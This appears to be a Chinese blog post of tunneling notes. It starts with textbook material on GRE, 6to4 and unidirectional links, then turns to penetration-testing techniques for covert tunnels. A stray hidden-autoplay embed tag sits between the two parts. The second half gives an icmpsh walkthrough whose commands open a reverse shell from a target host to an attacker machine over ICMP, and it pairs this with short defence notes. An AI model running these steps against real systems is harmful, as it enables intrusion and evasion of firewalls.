挂羊头卖狗肉的技术实现。如果B/S或C/S中间的防火墙只支持使用http协议来访问资源，而你想使用https协议进行资源访问，直接使用https会被防火墙视为攻击流量而被挡掉，为此，有了隧道技术，将https请求封装在http请求中，从而绕过防火墙，访问到资源。

隧道技术 

隧道技术（Tunneling）是一种通过使用互联网络的基础设施在网络之间建立一条虚拟链路以传递数据的方式。使用隧道传递的数据可以是不同协议的PDU，隧道将其他协议的PDU重新封装后通过网络发送，新的PDU提供路由信息，以便通过互联网传递被封装的数据。由于PDU经过重新封装，使得数据的发送方和接收方就像在一条专有“隧道”中进行数据传输和通信，隧道技术因此得名。

一般来说，隧道是在高层（或同等层）分组中携带低层数据。例如，在一个IPv4或IPv6分组中携带IPv4数据，在一个UDP、IPv4或IPv6分组中携带以太网数据。隧道转变了在头部中协议严格分层的思路，并允许形成覆盖网络（即这些“链路”实际是其他协议实现的虚拟链路，而不是物理连接的网络）。通过隧道的建立，可实现将数据强制送到特定的地址、隐藏私有的网络地址、在IP网上传递非IP数据包、提供数据安全支持等功能。

应用概述

为了建立隧道，隧道两端的通信方（一般角色为客户端和服务器）必须使用相同的隧道协议。隧道技术可分别以第2层隧道协议或第3层隧道协议为基础。第2层隧道协议对应于OSI模型中的数据链路层，使用帧作为数据交换单位，如：点对点隧道协议（Point-to-Point Tunneling Protocol, PPTP）、第2层隧道协议（L2TP）、第2层转发协议（L2F）等。第3层隧道协议对应于OSI模型的网络层，使用包作为数据交换单位，如：IP安全协议（IPsec，实际是一套协议包）、IP in IP等。此外还有通用路由封装（General Router Encapsulation, GRE），它定义了在任意一种网络层协议上封装任意一个其它网络层协议。GRE使用IPv4或IPv6携带流量，因此更像是一种第3层隧道技术。

隧道技术是虚拟专用网络（Virtual Private Network, VPN）以及移动IP等实现的技术基础。

单向链路

当链路仅在一个方向工作时，这种链路称为单向链路（UDL）。由于它们需要交换信息（例如PPP配置信息），因此很多隧道协议在这种情况下不能正常运行。为了解决这种问题提出了一种标准，可在辅助Internet接口上创建隧道，它可与UDL操作相结合。单向链路的典型情况是由卫星提供下行流量（流向用户）而形成一条Internet连接，或者是调制解调器提供上行流量而形成一条拨号链路。这在卫星连接的用户主要是下载而不是上传的情况下是有用的，并且通常用于早期的卫星Internet连接。它使用GRE将链路层的上行流量封装在IP分组中。

为了在接收方自动建立和维护隧道，规定了一种动态隧道配置协议（DTCP）。DTCP设计在下行链路中发送组播Hello信息，因此任何有兴趣的接收方都可知道已有UDL及其MAC和IP地址。另外，Hello信息表示网络中一个隧道端点的接口，它可通过用户端的辅助接口到达。在用户选择隧道端点后，DTCP在GRE隧道中将同一MAC作为UDL封装返回流量。服务提供商接收由GRE封装的这些第2层帧（通常是以太网），将它们从四道中提取并适当转发。因此，上游（提供商）UDL需要手工配置隧道，下游（用户）自动配置隧道。这种UDL处理方法实际上是为上层协议不对称地“隐藏”链路。因此，这条链路“两个”方向上的性能（延迟、带宽）可能非常不对称（最直观的感受是家用宽带的上传速率往往比下载速率要低得多），并可能对高层协议产生不利影响。

上述情况说明隧道的一个重要问题是配置的工作量，这个工作以前一直由手工完成。在通常情况下，隧道配置协议涉及选择一个隧道端点，以及对方的IP地址配置位于隧道端点的设备，也许还需要选择协议和提供认证信息。为此出现一些相关技术以协助自动配置或使用隧道。一种从IPv4向IPv6过渡的方法称为6to4。在6to4中，IPv6分组在一个IPv4网络中通过隧道传输，它的好处在于只需要一个全球惟一的IPv6地址便可使得整个站点获得IPv6的连接。

6to4采用特殊的IPv6地址使在IPv4海洋中的IPv6孤岛能相互连接。此时IPv6的出口路由器与其他的IPv6域建立隧道连接。IPv4隧道的末端可从IPv6域的地址前缀中自动提取，因为站点的IPv4地址包含在IPv6地址前缀中。6to4另一个特点是它可以自动从IPv6 地址的前缀中提取一个IPv4地址。通过这个机制，站点能够配置IPv6而不需要向注册机构申请IPv6地址空间。这同时也简化了ISP提供商的管理工作。

 

                                                                                         本文部分内容摘自《TCP/IP详解 卷1：协议（中文版）第2版》、百度百科

 

<EMBED src="your.mid"autostart=“true” loop=“true” hidden=“true”>

hidden：是否完全隐藏控制面板，还有很多设置参数，比如也可以设置显示面板，然后设置宽高WIDTH=“整数” 和 HIGH=“整数”
1.隐藏通信隧道基础
1.1隐藏通信隧道技术概述
常用的隧道：

网络层：IPv6隧道，ICMP隧道，GRE隧道

传输层：TCP隧道，UDP隧道，常规端口转发

应用程：SSH隧道，HTTP隧道，HTTPS隧道，DNS隧道
1.2 判断内网的连通性
综合判断各种协议（TCP,HTTP,DNS,ICMP）及端口通信的情况。常用的允许流量出的端口有 80，8080，443，53，110，123等。
内网连通性判断方法：
1，ICMP协议、

执行命令 "ping <IP地址域名>“



2,TCP协议

netcat（nc）誉为瑞士军刀，通过使用TCP或UDP协议的网络连接读写数据

使用nc工具，执行 nc <IP地址 端口号>



3，HTTP协议

curl是利用URL规则在命令行下工作的综合传输工具，

支持文件下载和上传  ，在windows系统中需要安装

命令：curl <IP地址 端口号>

链接：https://pan.baidu.com/s/1uBF8eDXI9nBJXB2tbqikpQ

提取码：zyx1



4，DNS协议

dns连通性，常用命令  ：nslookup和dig

nslookup是windows自带 dns探测命令，在没有指定vps-ip时，nslookup会从系统网络中的TCP/IP属性中读取DNS服务器的地址

输入 nslookup 按回车键 输入 help命令




dig是linux自带的命令 输入 dig -h显示帮助信息

dig命令使用详解
2. 网络层隧道技术
在网络层中 ，两个常用的的隧道协议是IPv6 和IMCP
2.1 IPv6隧道
用来代替现行的IPv4协议的一种新IP协议

防御IPv6隧道攻击的方法

了解IPv6的具体漏洞，结合其他协议，通过防火墙和深度防御系统过滤IPv6通信，提高主机和应用程序的安全性

2.2 ICMP隧道

ICMP隧道简单，实用，是一个比较特殊的协议  常见的ICMP消息为ping命令的回复，将TCP/UDP数据封装到ICMP的ping数据据包中，穿过防火墙，实现不受限制的网络访问

** icmpsh**

使用简单不需要管理员权限

使用git clone命令下载icmpsh  下载地址



安装python的impacket类库  以便对TCP,UDP,ICMP,IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerbers,WML,LDAP等协议进行访问，

安装python-impacket
apt-get install python-impacket



因为icmpsh工具会替代系统本身的ping命令的应答程序，需要关闭本地系统的ICMP应答（如果要恢复系统应答，则设置为0），否则shell的运行会不稳定（表现为一直刷屏，无法进入交互输入）
sysctl -w net.ipv4.icmp_echo_ignore_all=1


输入  ./run.sh 并运行，会提示出现输入目标的IP地址（目标主机的公网IP地址)



在目标主机上查看ip地址，输入如下命令：
icmpsh.exe -t 192.168.227.137（攻击机ip） -d 30 -s 128

在目标主机运行以上命令，即可在VPS中看到 192.168.227.133得shell
防御ICMP隧道攻击的方法
网络管理员会阻止ICMP通信进入站点，在出站方向  ICMP通信是被允许的，目前大多数的网络和边界设备不会过滤ICMP流量

使用ICMP隧道时会产生大量的ICMP数据包，可以通过wireshark进行ICMP数据包分析，已检测恶意ICMP流量

IPV6隧道

IPv6(Internet Protocol Version 6)，是用来替代IPv4的一种新的IP协议。IPv6隧道技术是指通过IPv4隧道传送IPv6数据报文的技术。为了在IPv4海洋中传递IPv6信息，可以将IPv4作为隧道载体，将IPv6报文整体封装在IPv4数据报文中，使IPv6报文整体封装在IPv4数据报文中，使IPv6报文能够穿过IPv4海洋，到达另一个IPv6小岛。

IPv6隧道的工作过程如下：

节点A要向节点B发送IPv6报文，首先需要在节点A和节点B之间建立一条隧道
	
节点A将IPv6报文封装在以节点B的IPv4地址为目的地址，以自己的IPv4地址为源地址的IPv4报文中，并发往IPv4海洋
	
在IPv4海洋中，这个报文和普通IPv4报文一样，经过IPv4的转发到达节点B
	
节点B收到此报文之后，解除IPv4封装，取出其中的IPv6报文
攻击者有时会通过恶意软件来配置允许进行IPv6通信 设备，以避开防火墙和入侵检测系统。有一点需要指出：即使设备支持IPv6，也可能无法正确分析封装了IPv6报文的IPv4数据包

配置隧道和自动隧道的主要区别是：只有在执行隧道功能的节点的IPv6地址是IPv4兼容地址时，自动隧道才是可行的。在为执行隧道功能的节点分配IP地址时，如果采用的是自动隧道方法，就不需要进行配置。

配置隧道方法则要求隧道末端节点使用其他机制来获得其IPv4地址，例如采用DHCP、人工配置或其他IPv4的配置机制。

支持IPv6的隧道工具有socat、6tunnel、nt6tunnel等。

未完待续。。